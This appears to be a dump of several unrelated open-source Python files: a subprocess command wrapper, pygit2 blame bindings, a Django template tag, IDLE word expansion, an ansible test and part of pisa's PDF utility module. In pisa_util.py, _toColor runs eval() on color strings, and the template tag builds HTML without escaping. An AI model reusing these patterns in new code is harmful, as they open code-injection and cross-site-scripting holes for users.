            if self.cmd == Command.__LIST_CMD:
                result = self.__execute('ls', host, timeout)
                self.__stdout = [JSONify.dumps(self.__stdout)]
            else:
                statement = ['./' + self.cmd]
                statement.extend(self.params)

                result = self.__execute(statement, host, timeout)

        except OSError as ex:
            return self.error(repr(ex))

        return result

    def error(self, message):
        """Record an error state: empty stdout, the message on stderr,
        and return code 1."""
        self.__stdout = []
        self.__stderr = [message]
        self.__return_code = 1

    # ----------------------------------------------------------------------------------------------------------------

    def __execute(self, statement, host, timeout):
        p = Popen(statement, cwd=host.command_path(), stdout=PIPE, stderr=PIPE)

        try:
            stdout_bytes, stderr_bytes = p.communicate(timeout=timeout)

            self.__stdout = stdout_bytes.decode().strip().splitlines()
            self.__stderr = stderr_bytes.decode().strip().splitlines()
            self.__return_code = p.returncode

            return self.__return_code == 0

        except TimeoutExpired as ex:
            # Bug fix: the child process was previously left running
            # after a timeout.  Kill and reap it, as the subprocess
            # documentation recommends, before recording the error.
            p.kill()
            p.communicate()

            self.error(repr(ex))
            return False

    # ----------------------------------------------------------------------------------------------------------------

    def as_json(self):
        jdict = OrderedDict()

        jdict['cmd'] = self.cmd
        jdict['params'] = self.params

        jdict['stdout'] = self.stdout
        jdict['stderr'] = self.stderr

        jdict['ret'] = self.return_code

        return jdict

    # ----------------------------------------------------------------------------------------------------------------

    @property
    def cmd(self):
        return self.__cmd

    @property
    def params(self):
        return self.__params

    @property
    def stdout(self):
        return self.__stdout

    @property
    def stderr(self):
        return self.__stderr

    @property
    def return_code(self):
        return self.__return_code

    # ----------------------------------------------------------------------------------------------------------------

    def __str__(self, *args, **kwargs):
        return "Command:{cmd:%s, params:%s, stdout:%s, stderr:%s, return_code:%s}" % \
               (self.cmd, self.params, self.stdout, self.stderr, self.return_code)
| mit |
yarikoptic/python-pygit2 | pygit2/blame.py | 2 | 4614 | # -*- coding: utf-8 -*-
#
# Copyright 2010-2014 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
# Import from the future
from __future__ import absolute_import, unicode_literals
# Import from pygit2
from .errors import check_error
from .ffi import ffi, C
from .utils import to_bytes, is_string, to_str
from _pygit2 import Signature, Oid
def wrap_signature(csig):
    """Convert a C ``git_signature`` pointer into a pygit2 Signature.

    Returns None for a NULL pointer.
    """
    if not csig:
        return None

    return Signature(ffi.string(csig.name).decode('utf-8'),
                     ffi.string(csig.email).decode('utf-8'),
                     csig.when.time, csig.when.offset, 'utf-8')
class BlameHunk(object):
    """A contiguous group of blamed lines attributed to one commit."""

    @classmethod
    def _from_c(cls, blame, ptr):
        # Keep a reference to the owning Blame so the underlying C memory
        # stays alive as long as this hunk does.
        hunk = cls.__new__(cls)
        hunk._blame = blame
        hunk._hunk = ptr
        return hunk

    @property
    def lines_in_hunk(self):
        """Number of lines"""
        return self._hunk.lines_in_hunk

    @property
    def boundary(self):
        """Tracked to a boundary commit"""
        # Casting directly to bool via cffi does not seem to work
        return int(ffi.cast('int', self._hunk.boundary)) != 0

    @property
    def final_start_line_number(self):
        """Final start line number"""
        return self._hunk.final_start_line_number

    @property
    def final_committer(self):
        """Final committer"""
        return wrap_signature(self._hunk.final_signature)

    @property
    def final_commit_id(self):
        # Copy the raw 20-byte oid out of the C struct into a Python Oid.
        return Oid(raw=bytes(ffi.buffer(ffi.addressof(self._hunk, 'final_commit_id'))[:]))

    @property
    def orig_start_line_number(self):
        """Origin start line number"""
        return self._hunk.orig_start_line_number

    @property
    def orig_committer(self):
        """Original committer"""
        return wrap_signature(self._hunk.orig_signature)

    @property
    def orig_commit_id(self):
        # Copy the raw 20-byte oid out of the C struct into a Python Oid.
        return Oid(raw=bytes(ffi.buffer(ffi.addressof(self._hunk, 'orig_commit_id'))[:]))

    @property
    def orig_path(self):
        """Original path"""
        path = self._hunk.orig_path
        if not path:
            return None

        return ffi.string(path).decode()
class Blame(object):
    """Result of a blame operation: an indexable sequence of BlameHunk."""

    @classmethod
    def _from_c(cls, repo, ptr):
        blame = cls.__new__(cls)
        blame._repo = repo
        blame._blame = ptr
        return blame

    def __del__(self):
        # Release the underlying libgit2 git_blame object.
        C.git_blame_free(self._blame)

    def __len__(self):
        return C.git_blame_get_hunk_count(self._blame)

    def __getitem__(self, index):
        # libgit2 returns NULL for an out-of-range index.
        chunk = C.git_blame_get_hunk_byindex(self._blame, index)
        if not chunk:
            raise IndexError

        return BlameHunk._from_c(self, chunk)

    def for_line(self, line_no):
        """for_line(line_no) -> BlameHunk

        Returns the blame hunk data for a given line given its number
        in the current Blame.

        Arguments:

        line_no
            Line number, starts at 1.
        """
        if line_no < 0:
            raise IndexError

        chunk = C.git_blame_get_hunk_byline(self._blame, line_no)
        if not chunk:
            raise IndexError

        return BlameHunk._from_c(self, chunk)
class BlameIterator(object):
    """Sequential iterator over the hunks of a Blame object."""

    def __init__(self, blame):
        self._count = len(blame)
        self._index = 0
        self._blame = blame

    def __iter__(self):
        # Make the iterator usable directly in for-loops.
        return self

    def __next__(self):
        if self._index >= self._count:
            raise StopIteration

        # Bug fix: the original indexed the blame with itself
        # (``self._blame[self._blame]``), which raised a TypeError on the
        # very first iteration; index with the running counter instead.
        hunk = self._blame[self._index]
        self._index += 1

        return hunk

    def next(self):
        # Python 2 iterator-protocol compatibility.
        return self.__next__()
| gpl-2.0 |
simpleoncall/simpleoncall | simpleoncall/templatetags/form.py | 1 | 2106 | from django import template
from simpleoncall.models import NotificationType
from simpleoncall.templatetags.icons import EvilIconNode
register = template.Library()
def pop_default(l, d):
    """Pop and return the first element of *l*, or *d* when *l* is empty.

    Note: mutates *l* in place when it is non-empty.
    """
    return l.pop(0) if l else d
class NotificationSettingRowNode(template.Node):
    """Template node rendering one alert-setting row: a notification-type
    dropdown, a delay (minutes) input, and a remove icon."""

    # Human-readable labels for each supported notification channel.
    TYPE_OPTIONS = {
        NotificationType.EMAIL: 'E-Mail',
        NotificationType.SMS: 'SMS',
        NotificationType.VOICE: 'Voice',
        NotificationType.PUSHBULLET: 'Pushbullet',
    }

    def __init__(self, id, selected_type='email', selected_time=0, disabled=False):
        self.id = id
        self.type = selected_type
        self.time = selected_time
        self.disabled = disabled

    def render(self, context=None):
        """Return the row's HTML; *context* is accepted for the django
        Node interface but unused."""
        disabled = 'disabled' if self.disabled else ''
        output = (
            '<div class="alert-setting-row %s" data-id="%s">'
            '<select name="alert_type">'
        ) % (disabled, self.id)
        # Compatibility fix: dict.iteritems() exists only on Python 2;
        # items() behaves identically here on both Python 2 and 3.
        for value, label in self.TYPE_OPTIONS.items():
            selected = 'selected' if value == self.type else ''
            output += '<option value="%s" %s>%s</option>' % (value, selected, label)

        remove_icon = EvilIconNode('ei-minus')
        output += (
            '</select>'
            'After'
            '<input type="text" name="alert_time" value="%s" maxlength="3" />'
            'Minutes'
            '<span class="remove-alert-row">'
            '%s'
            '</span>'
            '</div>'
        ) % (self.time, remove_icon.render())
        return output
@register.tag('notification_setting_row')
def notification_setting_row(parser, token):
    """Template tag: {% notification_setting_row index type time disabled %}.

    All arguments are optional and positional; missing ones fall back to
    the defaults below.
    """
    parts = token.split_contents()
    parts.pop(0)  # discard the tag name itself

    index = pop_default(parts, 0)
    selected_type = pop_default(parts, 'email')
    selected_time = pop_default(parts, 0)
    # NOTE(review): split_contents() yields strings, so bool('0') is True
    # -- any fourth argument, including "0"/"false", marks the row
    # disabled.  Presumably intentional (presence == disabled); confirm.
    disabled = bool(pop_default(parts, 0))
    return NotificationSettingRowNode(index, selected_type, selected_time, disabled)
@register.filter('notification_setting_row')
def notification_setting_filter(alert):
    """Render an existing alert object as a (non-disabled) setting row."""
    node = NotificationSettingRowNode(alert.id, alert.type, alert.time, 0)
    return node.render()
| mit |
maohongyuan/kbengine | kbe/src/lib/python/Lib/idlelib/AutoExpand.py | 122 | 3395 | '''Complete the current word before the cursor with words in the editor.
Each menu selection or shortcut key selection replaces the word with a
different word with the same prefix. The search for matches begins
before the target and moves toward the top of the editor. It then starts
after the cursor and moves down. It then returns to the original word and
the cycle starts again.
Changing the current text line or leaving the cursor in a different
place before requesting the next selection causes AutoExpand to reset
its state.
This is an extension file and there is only one instance of AutoExpand.
'''
import string
import re
###$ event <<expand-word>>
###$ win <Alt-slash>
###$ unix <Alt-slash>
class AutoExpand:
    """Expand the word before the cursor by cycling through other words
    in the editor text that share the same prefix.
    """

    # Menu entry contributed to the editor's "edit" menu.
    menudefs = [
        ('edit', [
            ('E_xpand Word', '<<expand-word>>'),
        ]),
    ]

    # Characters treated as part of a word when matching prefixes.
    wordchars = string.ascii_letters + string.digits + "_"

    def __init__(self, editwin):
        self.text = editwin.text
        # (words, index, insert-position, line) of the previous expansion,
        # or None when no expansion cycle is in progress.
        self.state = None

    def expand_word_event(self, event):
        "Replace the current word with the next expansion."
        curinsert = self.text.index("insert")
        curline = self.text.get("insert linestart", "insert lineend")
        if not self.state:
            words = self.getwords()
            index = 0
        else:
            words, index, insert, line = self.state
            # Cursor moved or line changed since the last expansion:
            # restart the cycle from scratch.
            if insert != curinsert or line != curline:
                words = self.getwords()
                index = 0
        if not words:
            self.text.bell()
            return "break"
        # Replace the prefix before the cursor with the next candidate.
        word = self.getprevword()
        self.text.delete("insert - %d chars" % len(word), "insert")
        newword = words[index]
        index = (index + 1) % len(words)
        if index == 0:
            self.text.bell()  # Warn we cycled around
        self.text.insert("insert", newword)
        # Remember where we are so the next invocation can continue
        # the cycle.
        curinsert = self.text.index("insert")
        curline = self.text.get("insert linestart", "insert lineend")
        self.state = words, index, curinsert, curline
        return "break"

    def getwords(self):
        "Return a list of words that match the prefix before the cursor."
        word = self.getprevword()
        if not word:
            return []
        before = self.text.get("1.0", "insert wordstart")
        wbefore = re.findall(r"\b" + word + r"\w+\b", before)
        del before  # drop reference to the (possibly large) buffer
        after = self.text.get("insert wordend", "end")
        wafter = re.findall(r"\b" + word + r"\w+\b", after)
        del after
        if not wbefore and not wafter:
            return []
        # Deduplicate while keeping order: nearest-before matches first,
        # then matches after the cursor; the original prefix last so the
        # cycle ends where it started.
        words = []
        dict = {}
        # search backwards through words before
        wbefore.reverse()
        for w in wbefore:
            if dict.get(w):
                continue
            words.append(w)
            dict[w] = w
        # search onwards through words after
        for w in wafter:
            if dict.get(w):
                continue
            words.append(w)
            dict[w] = w
        words.append(word)
        return words

    def getprevword(self):
        "Return the word prefix before the cursor."
        line = self.text.get("insert linestart", "insert")
        i = len(line)
        while i > 0 and line[i-1] in self.wordchars:
            i = i-1
        return line[i:]
if __name__ == '__main__':
    # When run as a script, execute this extension's unit tests.
    import unittest
    unittest.main('idlelib.idle_test.test_autoexpand', verbosity=2)
| lgpl-3.0 |
felixfontein/ansible | test/units/module_utils/test_distro.py | 35 | 1512 |
# (c) 2018 Adrian Likins <alikins@redhat.com>
# Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# or
# Apache License v2.0 (see http://www.apache.org/licenses/LICENSE-2.0)
#
# Dual licensed so any test cases could potentially be included by the upstream project
# that module_utils/distro.py is from (https://github.com/nir0s/distro)
# Note that nir0s/distro has many more tests in its test suite. The tests here are
# primarily for testing the vendoring.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils import distro
from ansible.module_utils.six import string_types
# Generic test case with minimal assertions about specific returned values.
class TestDistro():
    """Sanity checks for the vendored distro module.

    These should run on any platform without errors, even on non-Linux
    systems where there is no useful distribution info to return.
    """

    def test_info(self):
        info = distro.info()
        # BUG FIX: failure message said "not a dist" instead of "not a dict".
        assert isinstance(info, dict), \
            'distro.info() returned %s (%s) which is not a dict' % (info, type(info))

    def test_linux_distribution(self):
        linux_dist = distro.linux_distribution()
        # BUG FIX: failure message misspelled "linux_distrution".
        assert isinstance(linux_dist, tuple), \
            'linux_distribution() returned %s (%s) which is not a tuple' % (linux_dist, type(linux_dist))

    def test_id(self):
        # Renamed the local from `id` to avoid shadowing the builtin.
        distro_id = distro.id()
        assert isinstance(distro_id, string_types), \
            'distro.id() returned %s (%s) which is not a string' % (distro_id, type(distro_id))
| gpl-3.0 |
Shapes/pisa-fix-django | sx/pisa3/pisa_util.py | 1 | 26066 | # -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from reportlab.lib.units import inch, cm
from reportlab.lib.styles import *
from reportlab.lib.enums import *
from reportlab.lib.colors import *
from reportlab.lib.pagesizes import *
from reportlab.pdfbase import pdfmetrics
# from reportlab.platypus import *
# from reportlab.platypus.flowables import Flowable
# from reportlab.platypus.tableofcontents import TableOfContents
# from reportlab.platypus.para import Para, PageNumberObject, UNDERLINE, HotLink
import reportlab
import copy
import types
import os
import os.path
import pprint
import sys
import string
import re
import base64
import urlparse
import mimetypes
import urllib2
import urllib
import httplib
import tempfile
import shutil
rgb_re = re.compile("^.*?rgb[(]([0-9]+).*?([0-9]+).*?([0-9]+)[)].*?[ ]*$")
# Lexicographic comparison of the first three characters of the version
# string, e.g. "2.1" -- NOTE(review): this would misjudge a hypothetical
# two-digit major version; adequate for the 2.x series this targets.
if not (reportlab.Version[:3]>="2.1"):
    raise ImportError("Reportlab Version 2.1+ is needed!")

REPORTLAB22 = (reportlab.Version[:3]>="2.1")
# print "***", reportlab.Version, REPORTLAB22, reportlab.__file__
import logging
log = logging.getLogger("ho.pisa")
try:
import cStringIO as StringIO
except:
import StringIO
try:
import pyPdf
except:
pyPdf = None
try:
from reportlab.graphics import renderPM
except:
renderPM = None
try:
from reportlab.graphics import renderSVG
except:
renderSVG = None
def ErrorMsg():
    """Return the currently handled exception as a formatted traceback string.

    Must be called from inside an ``except`` block; reads sys.exc_info().
    """
    # Removed the unused `cgi` import and the builtin-shadowing local
    # `list`; replaced Python-2-only string.join() with str.join().
    import traceback, sys
    exc_type, exc_value, tb = sys.exc_info()
    lines = traceback.format_tb(tb) + traceback.format_exception_only(exc_type, exc_value)
    return "Traceback (innermost last):\n" + "%-20s %s" % (
        "".join(lines[: - 1]),
        lines[ - 1])
def toList(value):
    """Return *value* as a list.

    Lists and tuples are converted with list() (lists are copied);
    any other object becomes a single-element list.  Uses isinstance()
    instead of the Python-2-only types.ListType/TupleType identity check,
    which also accepts list/tuple subclasses.
    """
    if isinstance(value, (list, tuple)):
        return list(value)
    return [value]
def flatten(x):
    """flatten(sequence) -> list

    copied from http://kogs-www.informatik.uni-hamburg.de/~meine/python_tricks

    Returns a single, flat list which contains all elements retrieved
    from the sequence and all recursively contained sub-sequences
    (iterables).

    Examples:
    >>> flatten([1, 2, [3, 4], (5, 6)])
    [1, 2, 3, 4, 5, 6]
    >>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])
    [1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]"""
    result = []
    for el in x:
        #if isinstance(el, (list, tuple)):
        # Recurse into anything iterable except strings; `basestring`
        # is Python 2 only -- this module targets Python 2 throughout.
        if hasattr(el, "__iter__") and not isinstance(el, basestring):
            result.extend(flatten(el))
        else:
            result.append(el)
    return result
def _toColor(arg, default=None):
    '''try to map an arbitrary arg to a color instance'''
    if isinstance(arg, Color): return arg
    tArg = type(arg)
    if tArg in (types.ListType, types.TupleType):
        # 3 components -> RGB Color, 4 components -> CMYKColor;
        # every component must lie in 0..1.
        assert 3 <= len(arg) <= 4, 'Can only convert 3 and 4 sequences to color'
        assert 0 <= min(arg) and max(arg) <= 1
        return len(arg) == 3 and Color(arg[0], arg[1], arg[2]) or CMYKColor(arg[0], arg[1], arg[2], arg[3])
    elif tArg == types.StringType:
        # First try reportlab's named-color table.
        C = getAllNamedColors()
        s = arg.lower()
        if C.has_key(s): return C[s]
        try:
            # SECURITY NOTE: eval() of the color string -- dangerous if the
            # value can originate from untrusted input; flagged for review.
            return toColor(eval(arg))
        except:
            pass
        try:
            return HexColor(arg)
        except:
            if default is None:
                raise ValueError('Invalid color value %r' % arg)
            return default
def getColor(value, default=None):
    """Convert a CSS-style color value (name, #rgb/#rrggbb hex, rgb()
    function text or Color instance) into a color object; *default* is
    returned for "transparent"/"none" and for unparseable values."""
    try:
        original = value
        if isinstance(value, Color):
            return value
        value = str(value).strip().lower()
        if value == "transparent" or value == "none":
            return default
        if value in COLOR_BY_NAME:
            return COLOR_BY_NAME[value]
        if value.startswith("#") and len(value) == 4:
            # Expand the short #rgb form to #rrggbb.
            value = "#" + value[1] + value[1] + value[2] + value[2] + value[3] + value[3]
        elif rgb_re.search(value):
            # e.g., value = "<css function: rgb(153, 51, 153)>", go figure:
            r, g, b = [int(x) for x in rgb_re.search(value).groups()]
            value = "#%02x%02x%02x" % (r, g, b)
        else:
            # Shrug
            pass
        # XXX Throws illegal in 2.1 e.g. toColor('none'),
        # therefore we have a workaround here
        return _toColor(value)
    except ValueError, e:
        log.warn("Unknown color %r", original)
        return default
def getBorderStyle(value, default=None):
    """Return *value* as a border style, or *default* for invisible ones.

    Falsy values and the CSS styles "none"/"hidden" (case-insensitive)
    count as "no border" and yield the default.
    """
    if not value:
        return default
    if str(value).lower() in ("none", "hidden"):
        return default
    return value
mm = cm / 10.0
dpi96 = (1.0 / 96.0 * inch)
_absoluteSizeTable = {
"1": 50.0 / 100.0,
"xx-small": 50.0 / 100.0,
"x-small": 50.0 / 100.0,
"2": 75.0 / 100.0,
"small": 75.0 / 100.0,
"3": 100.0 / 100.0,
"medium": 100.0 / 100.0,
"4": 125.0 / 100.0,
"large": 125.0 / 100.0,
"5": 150.0 / 100.0,
"x-large": 150.0 / 100.0,
"6": 175.0 / 100.0,
"xx-large": 175.0 / 100.0,
"7": 200.0 / 100.0,
"xxx-large": 200.0 / 100.0,
#"xx-small" : 3./5.,
#"x-small": 3./4.,
#"small": 8./9.,
#"medium": 1./1.,
#"large": 6./5.,
#"x-large": 3./2.,
#"xx-large": 2./1.,
#"xxx-large": 3./1.,
}
_relativeSizeTable = {
"larger": 1.25,
"smaller": 0.75,
"+4": 200.0 / 100.0,
"+3": 175.0 / 100.0,
"+2": 150.0 / 100.0,
"+1": 125.0 / 100.0,
"-1": 75.0 / 100.0,
"-2": 50.0 / 100.0,
"-3": 25.0 / 100.0,
}
MIN_FONT_SIZE = 1.0
def getSize(value, relative=0, base=None, default=0.0):
    """
    Convert a CSS-style size value to points.

    value    -- number, string ("2cm", "12pt", "120%", "small", ...) or a
                sequence of string fragments that is joined first.
    relative -- reference size (typically the current font size) used for
                relative units (em, ex, %) and the named size keywords.
    base     -- optional base size for the named size tables.
    default  -- returned when the value cannot be parsed.
    """
    try:
        original = value
        if value is None:
            return relative
        elif isinstance(value, float):
            return value
        elif isinstance(value, int):
            return float(value)
        elif isinstance(value, (tuple, list)):
            value = "".join(value)
        value = str(value).strip().lower().replace(",", ".")
        if value[-4:] == 'inch':
            # BUG FIX: the original compared value[-2:] against 'inch',
            # which can never match, so "Xinch" values silently fell
            # through to the float() parse and returned the default.
            return float(value[:-4].strip()) * inch
        elif value[-2:] == 'cm':
            return float(value[:-2].strip()) * cm
        elif value[-2:] == 'mm':
            return float(value[:-2].strip()) * mm  # 1mm = 0.1cm
        elif value[-2:] == 'in':
            return float(value[:-2].strip()) * inch  # 1pt == 1/72inch
        elif value[-2:] == 'pt':
            return float(value[:-2].strip())
        elif value[-2:] == 'pc':
            return float(value[:-2].strip()) * 12.0  # 1pc == 12pt
        elif value[-2:] == 'px':
            # XXX W3C says, use 96dpi http://www.w3.org/TR/CSS21/syndata.html#length-units
            return float(value[:-2].strip()) * dpi96
        elif value[-1:] == 'i':  # 1pt == 1/72inch
            return float(value[:-1].strip()) * inch
        elif value in ("none", "0", "auto"):
            return 0.0
        elif relative:
            if value[-2:] == 'em':  # 1em = 1 * fontSize
                return float(value[:-2].strip()) * relative
            elif value[-2:] == 'ex':  # 1ex = 1/2 fontSize
                return float(value[:-2].strip()) * (relative / 2.0)
            elif value[-1:] == '%':  # 1% = (fontSize * 1) / 100
                return (relative * float(value[:-1].strip())) / 100.0
            elif value in ("normal", "inherit"):
                return relative
            elif value in _relativeSizeTable:
                if base:
                    return max(MIN_FONT_SIZE, base * _relativeSizeTable[value])
                return max(MIN_FONT_SIZE, relative * _relativeSizeTable[value])
            elif value in _absoluteSizeTable:
                if base:
                    return max(MIN_FONT_SIZE, base * _absoluteSizeTable[value])
                return max(MIN_FONT_SIZE, relative * _absoluteSizeTable[value])
        try:
            value = float(value)
        except Exception:
            log.warn("getSize: Not a float %r", value)
            return default  # value = 0
        return max(0, value)
    except Exception:
        log.warn("getSize %r %r", original, relative, exc_info=1)
        return default
def getCoords(x, y, w, h, pagesize):
    """Translate coordinates given from the upper-left corner of the page
    into the page's bottom-left-origin coordinate system.

    Negative x/y are treated as offsets from the right/bottom edge;
    non-positive w/h extend to the respective page border (plus the
    given offset).  Returns (x, y) when w or h is None, otherwise
    (x, y, w, h).
    """
    page_width, page_height = pagesize
    if x < 0:
        x += page_width
    if y < 0:
        y += page_height
    if w is None or h is None:
        return x, page_height - y
    if w <= 0:
        w = page_width - x + w
    if h <= 0:
        h = page_height - y + h
    return x, page_height - y - h, w, h
def getBox(box, pagesize):
    """
    Parse sizes by corners in the form:
    <X-Left> <Y-Upper> <Width> <Height>

    The last two values, when negative, are interpreted as offsets from
    the right and lower border.
    """
    box = str(box).split()
    if len(box) != 4:
        raise Exception, "box not defined right way"
    x, y, w, h = map(getSize, box)
    # getCoords translates from top-left-origin to the page's
    # bottom-left-origin coordinate system.
    return getCoords(x, y, w, h, pagesize)
def getPos(position, pagesize):
    """
    Parse a pair of coordinates ("<X> <Y>"), translating them from
    top-left-origin to the page coordinate system via getCoords.
    """
    position = str(position).split()
    if len(position) != 2:
        raise Exception, "position not defined right way"
    x, y = map(getSize, position)
    return getCoords(x, y, None, None, pagesize)
def getBool(s):
    """Interpret *s* loosely as a boolean flag ("y", "yes", "1", "true")."""
    text = str(s).lower()
    return text in ("y", "yes", "1", "true")
_uid = 0

def getUID():
    """Return a process-wide unique ID as a string (monotonic counter)."""
    global _uid
    _uid = _uid + 1
    return str(_uid)
# CSS text-align keywords mapped to reportlab's TA_* paragraph constants.
_alignments = {
    "left": TA_LEFT,
    "center": TA_CENTER,
    "middle": TA_CENTER,
    "right": TA_RIGHT,
    "justify": TA_JUSTIFY,
}

def getAlign(value, default=TA_LEFT):
    """Map a CSS text-align keyword to the matching TA_* constant."""
    return _alignments.get(str(value).lower(), default)
#def getVAlign(value):
# # Unused
# return str(value).upper()
GAE = "google.appengine" in sys.modules

# Buffering strategies used by pisaTempFile: index 0 is the in-memory
# buffer, index 1 the disk-backed temporary file.  On Google App Engine
# both fall back to StringIO -- presumably because real temporary files
# are unavailable there (see the except fallback in pisaTempFile too).
if GAE:
    STRATEGIES = (
        StringIO.StringIO,
        StringIO.StringIO)
else:
    STRATEGIES = (
        StringIO.StringIO,
        tempfile.NamedTemporaryFile)
class pisaTempFile(object):
    """A temporary file implementation that uses memory unless
    either capacity is breached or fileno is requested, at which
    point a real temporary file will be created and the relevant
    details returned

    If capacity is -1 the second strategy will never be used.

    Inspired by:
    http://code.activestate.com/recipes/496744/
    """

    # Index 0: in-memory buffer; index 1: named temporary file.
    STRATEGIES = STRATEGIES

    # Default threshold (bytes) before switching to a disk-backed file.
    CAPACITY = 10 * 1024

    def __init__(self, buffer="", capacity=CAPACITY):
        """Creates a TempFile object containing the specified buffer.
        If capacity is specified, we use a real temporary file once the
        file gets larger than that size.  Otherwise, the data is stored
        in memory.
        """
        #if hasattr(buffer, "read"):
        #shutil.copyfileobj( fsrc, fdst[, length])
        self.capacity = capacity
        # strategy is 0 (memory) or 1 (disk), chosen by the initial size.
        self.strategy = int(len(buffer) > self.capacity)
        try:
            self._delegate = self.STRATEGIES[self.strategy]()
        except:
            # Fallback for Google App Engine etc. where the temp-file
            # strategy cannot be instantiated.
            self._delegate = self.STRATEGIES[0]()
        self.write(buffer)

    def makeTempFile(self):
        " Switch to the next strategy. If an error occurred, stay with the first strategy "
        if self.strategy == 0:
            try:
                new_delegate = self.STRATEGIES[1]()
                new_delegate.write(self.getvalue())
                self._delegate = new_delegate
                self.strategy = 1
                log.warn("Created temporary file %s", self.name)
            except:
                # Switching failed (e.g. sandboxed environment); disable
                # the capacity check so we never try again.
                self.capacity = -1

    def getFileName(self):
        " Get a named temporary file "
        self.makeTempFile()
        return self.name

    def fileno(self):
        """Forces this buffer to use a temporary file as the underlying
        object and returns the fileno associated with it.
        """
        self.makeTempFile()
        return self._delegate.fileno()

    def getvalue(self):
        " Get value of file. Work around for second strategy "
        if self.strategy == 0:
            return self._delegate.getvalue()
        # A real file has no getvalue(); flush and read it back instead.
        self._delegate.flush()
        self._delegate.seek(0)
        return self._delegate.read()

    def write(self, value):
        " If capacity != -1 and length of file > capacity it is time to switch "
        if self.capacity > 0 and self.strategy == 0:
            len_value = len(value)
            if len_value >= self.capacity:
                needs_new_strategy = True
            else:
                self.seek(0, 2)  # find end of file
                needs_new_strategy = \
                    (self.tell() + len_value) >= self.capacity
            if needs_new_strategy:
                self.makeTempFile()
        self._delegate.write(value)

    def __getattr__(self, name):
        # Everything not defined here is proxied to the underlying
        # StringIO / NamedTemporaryFile delegate.
        try:
            return getattr(self._delegate, name)
        except AttributeError:
            # hide the delegation
            e = "object '%s' has no attribute '%s'" \
                % (self.__class__.__name__, name)
            raise AttributeError(e)
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
    """Load the contents of a URI -- a data: URI, an http(s) URL or a
    local path -- optionally resolved against *basepath*, and expose the
    data, mime type and (when available) a file name on disk.
    """

    def __init__(self, uri, basepath=None):
        self.basepath = basepath
        self.mimetype = None
        self.file = None      # readable file-like object, when available
        self.data = None      # raw bytes, when already decoded (data: URI)
        self.uri = None
        self.local = None     # path on disk for local resources
        self.tmp_file = None  # lazily created by getNamedFile()
        uri = str(uri)
        log.debug("FileObject %r, Basepath: %r", uri, basepath)
        # Data URI
        if uri.startswith("data:"):
            m = _rx_datauri.match(uri)
            self.mimetype = m.group("mime")
            self.data = base64.decodestring(m.group("data"))
        else:
            # Check if we have an external scheme
            if basepath and not (uri.startswith("http://") or uri.startswith("https://")):
                urlParts = urlparse.urlparse(basepath)
            else:
                urlParts = urlparse.urlparse(uri)
            log.debug("URLParts: %r", urlParts)
            # Drive letters have len==1 but we are looking for things like http:
            if len(urlParts[0]) > 1 :
                # External data
                if basepath:
                    uri = urlparse.urljoin(basepath, uri)
                #path = urlparse.urlsplit(url)[2]
                #mimetype = getMimeType(path)
                # Using HTTPLIB
                server, path = urllib.splithost(uri[uri.find("//"):])
                if uri.startswith("https://"):
                    conn = httplib.HTTPSConnection(server)
                else:
                    conn = httplib.HTTPConnection(server)
                conn.request("GET", path)
                r1 = conn.getresponse()
                # log.debug("HTTP %r %r %r %r", server, path, uri, r1)
                if (r1.status, r1.reason) == (200, "OK"):
                    # data = r1.read()
                    self.mimetype = r1.getheader("Content-Type", None).split(";")[0]
                    self.uri = uri
                    if r1.getheader("content-encoding") == "gzip":
                        # zbuf = cStringIO.StringIO(data)
                        import gzip
                        self.file = gzip.GzipFile(mode="rb", fileobj=r1)
                        #data = zfile.read()
                        #zfile.close()
                    else:
                        self.file = r1
                    # self.file = urlResponse
                else:
                    # Anything other than a plain 200: fall back to urllib2.
                    urlResponse = urllib2.urlopen(uri)
                    self.mimetype = urlResponse.info().get("Content-Type", None).split(";")[0]
                    self.uri = urlResponse.geturl()
                    self.file = urlResponse
            else:
                # Local data
                if basepath:
                    uri = os.path.normpath(os.path.join(basepath, uri))
                if os.path.isfile(uri):
                    self.uri = uri
                    self.local = uri
                    self.setMimeTypeByName(uri)
                    self.file = open(uri, "rb")

    def getFile(self):
        # Return a readable file object, wrapping in-memory data in a
        # pisaTempFile when necessary; None when nothing was loaded.
        if self.file is not None:
            return self.file
        if self.data is not None:
            return pisaTempFile(self.data)
        return None

    def getNamedFile(self):
        # Return a real file system path for the resource, creating (and
        # caching) a temporary file when the data only exists in memory.
        if self.notFound():
            return None
        if self.local:
            return str(self.local)
        if not self.tmp_file:
            self.tmp_file = tempfile.NamedTemporaryFile()
            if self.file:
                shutil.copyfileobj(self.file, self.tmp_file)
            else:
                self.tmp_file.write(self.getData())
            self.tmp_file.flush()
        return self.tmp_file.name

    def getData(self):
        # Return the raw bytes, reading and caching them on first access.
        if self.data is not None:
            return self.data
        if self.file is not None:
            self.data = self.file.read()
            return self.data
        return None

    def notFound(self):
